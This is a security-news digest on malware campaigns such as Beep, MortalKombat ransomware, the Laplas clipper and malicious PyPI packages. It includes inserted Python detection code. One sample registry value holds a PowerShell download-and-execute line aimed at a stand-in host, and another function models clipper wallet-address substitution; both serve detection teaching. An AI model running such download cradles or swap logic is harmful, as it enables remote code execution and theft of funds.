Security News > 2023 > February

A new stealthy malware named 'Beep' was discovered last week. It packs a large number of techniques for evading analysis and detection by security software. Beep is an information stealer built from three separate components: a dropper, an injector, and the payload. The dropper creates a new registry key with a value named 'AphroniaHaimavati' that holds a base64-encoded PowerShell script.
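A base64-encoded PowerShell script parked in a registry value is easy to hunt for once you have a registry export in hand. The Python below is an added example, not code from the Beep analysis or from the malware itself: it walks a .reg export, decodes any long base64 string values (trying UTF-8 and then the UTF-16LE encoding that PowerShell's -EncodedCommand uses) and flags the ones containing PowerShell keywords. The key path and the script body inside the constructed sample export are assumptions made up for this example; only the value name 'AphroniaHaimavati' comes from the report.

```python
import base64
import binascii
import re

# Hypothetical script body and key path, constructed for this example only.
SAMPLE_SCRIPT = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Example]",
    '"AphroniaHaimavati"="%s"' % base64.b64encode(SAMPLE_SCRIPT.encode()).decode(),
    '"Theme"="dark"',
    # A long but benign base64 value: decodes to text, carries no PowerShell markers.
    '"Token"="%s"' % base64.b64encode(b"hello world, just a benign opaque token value").decode(),
])
# A second constructed blob, UTF-16LE encoded the way -EncodedCommand expects.
SAMPLE_UTF16_BLOB = base64.b64encode("Invoke-Expression 1".encode("utf-16-le")).decode()

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>[^"]*)"$')
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
PS_MARKERS = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|frombase64string|new-object|"
    r"start-process|-encodedcommand|-enc\b|-nop\b|-w hidden)",
    re.I,
)


def parse_reg_export(text):
    """Yield (key_path, value_name, data) for every string value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            yield key, m.group("name"), m.group("data")


def _is_text(s):
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_base64_blob(data):
    """Return decoded text if data is a long base64 blob of readable text, else None.

    UTF-8 is tried first. UTF-16LE (what -EncodedCommand expects) is tried second;
    its NUL bytes make the UTF-8 attempt fail the readability check.
    """
    if not B64_RE.match(data):
        return None
    try:
        raw = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _is_text(text):
            return text
    return None


def find_encoded_powershell(reg_text):
    """Return hits for registry values whose decoded base64 content looks like PowerShell."""
    hits = []
    for key, name, data in parse_reg_export(reg_text):
        decoded = decode_base64_blob(data)
        if decoded is None:
            continue
        markers = sorted({m.lower() for m in PS_MARKERS.findall(decoded)})
        if markers:
            hits.append({"key": key, "value": name, "markers": markers, "script": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_encoded_powershell(SAMPLE_REG):
        print(f"{hit['key']}\\{hit['value']}: {hit['markers']}")
        print("  " + hit["script"])
```

Run it against a real export (`reg export HKCU\Software out.reg` on the host, then read the file) rather than the constructed sample; the 40-character minimum in B64_RE keeps short legitimate values such as tokens and colour codes out of the results, and the keyword filter drops long opaque values that decode to text but carry no PowerShell.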

Hackers running a new financially motivated campaign are using a variant of the Xorist commodity ransomware named 'MortalKombat' together with the Laplas clipper, which swaps cryptocurrency wallet addresses on the victim's clipboard, in their attacks. Cisco Talos says MortalKombat is based on the Xorist commodity ransomware family, which ships with a builder that lets threat actors customize the malware.

In 2015, Chinese military hackers broke into the Office of Personnel Management and made off with highly personal information on about 22 million Americans who held security clearances. We need to demonstrate that it is possible to build systems that can defend themselves against hackers, criminals, and national intelligence agencies; secure Internet-of-Things systems; and systems that can re-establish security after a breach.

Malicious actors have published more than 451 unique Python packages to the official Python Package Index (PyPI) in an attempt to infect developer systems with clipper malware. Targeted web browsers include Google Chrome, Microsoft Edge, Brave, and Opera; the malware modifies browser shortcuts so that the malicious add-on is loaded automatically at launch via the "--load-extension" command-line switch.
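Both the MortalKombat/Laplas campaign above and this PyPI campaign deliver clipper malware, and the PyPI one persists by rewriting browser shortcut arguments. The Python below is an added example, not code from Cisco Talos, from the PyPI campaign's packages, or from the malware itself. It models the substitution a clipper performs (replace a copied wallet address with an attacker address of the same type), shows a defensive check that compares what the user copied with what the clipboard later holds, and parses a shortcut's argument string for --load-extension. The attacker wallets, clipboard history, and shortcut arguments are all constructed for the example.

```python
import re

# Wallet-address shapes a clipper typically watches for: legacy and bech32 Bitcoin, Ethereum.
WALLET_PATTERNS = {
    "btc": re.compile(r"(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})"),
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
}

# Constructed attacker-controlled addresses (not real wallets).
ATTACKER_WALLETS = {
    "btc": "bc1" + "q" * 30,
    "eth": "0x" + "de" * 20,
}


def wallet_type(text):
    """Return 'btc', 'eth' or None for a clipboard string that is exactly one address."""
    s = text.strip()
    for name, pat in WALLET_PATTERNS.items():
        if pat.fullmatch(s):
            return name
    return None


def clipper_swap(clipboard, attacker_wallets=ATTACKER_WALLETS):
    """Model what a clipper does: replace a copied address with the attacker's of the same type.

    Anything that is not a lone wallet address is left untouched, which is why
    victims rarely notice the substitution.
    """
    kind = wallet_type(clipboard)
    if kind in attacker_wallets:
        return attacker_wallets[kind]
    return clipboard


def detect_swaps(events):
    """Defensive check: compare what the user copied with what the clipboard now holds.

    events is a list of (kind, content) tuples, kind being 'copy' (a user action) or
    'observe' (a periodic clipboard read). An observed address of the same type that
    differs from the last copy, with no copy in between, is reported as an alert.
    """
    alerts = []
    last_copied = None
    for kind, content in events:
        if kind == "copy":
            last_copied = content
        elif kind == "observe" and last_copied is not None and content != last_copied:
            seen = wallet_type(content)
            if seen is not None and seen == wallet_type(last_copied):
                alerts.append({"type": seen, "expected": last_copied, "found": content})
    return alerts


# Persistence trick from the PyPI campaign: shortcut arguments that side-load an extension.
LOAD_EXT_RE = re.compile(r'--load-extension=("[^"]*"|\S+)')


def loaded_extensions(shortcut_args):
    """Return the extension directories a browser shortcut's argument string would side-load."""
    paths = []
    for value in LOAD_EXT_RE.findall(shortcut_args):
        paths.extend(p for p in value.strip('"').split(",") if p)
    return paths


if __name__ == "__main__":
    user_addr = "0x" + "ab" * 20
    history = [
        ("copy", user_addr),
        ("observe", clipper_swap(user_addr)),   # clipper has rewritten the clipboard
        ("copy", "lunch at 12"),
        ("observe", "lunch at 12"),
    ]
    print(detect_swaps(history))
    print(loaded_extensions(
        r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
        r'--load-extension="C:\Users\victim\AppData\Local\ext" --no-first-run'))
```

On a real host the 'copy' events come from a hook on the user's copy action and the 'observe' events from polling the clipboard; the shortcut argument strings come from reading each .lnk file's target and arguments. A browser shortcut that side-loads any extension directory is worth treating as suspect, since legitimate installs do not set that switch.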

CISOs are concerned about the rise of ransomware - not only the proliferation of attacks but also their sophistication: "The storage and backup environments are now under attack, as the attackers realize that this is the single biggest determining factor to show if the company will pay the ransom," says George Eapen, Group CIO at Petrofac. Immutable storage is the simplest way to protect backup data.

Apple has released security updates that fix a WebKit zero-day vulnerability that "may have been actively exploited." The bug is fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, and Safari 16.3.1, and possibly also in tvOS 16.3.2 and watchOS 9.3.1, though the release notes for those two updates have been temporarily withheld.

Microsoft on Monday attributed a set of attacks targeting diplomatic entities in South America to a China-based cyber espionage actor. The threat actor is said to use established tools such as the ShadowPad backdoor to infiltrate targets and maintain persistent access.

"Swiss Army knife" malware - multi-purpose malware that can perform malicious actions across the cyber kill chain and evade detection by security controls - is on the rise, according to Picus Security's analysis of over 550,000 real-world malware samples gathered from commercial and open-source threat intelligence services, security vendors and researchers, and malware sandboxes and databases. The average sample leverages 11 different tactics, techniques, and procedures (TTPs).

Eurostar password reset bug is locking passengers out. Users who visit the password reset link are met with a "Technical problems" message, making it impossible for them to reset their password or log in to their accounts.

In a refresh, CISA and NIST should acknowledge the reality that an organization is made up of component parts, including the network, the cloud, mobile devices and countless endpoints. Too few companies and organizations see what CISA produces and follow its valuable advice.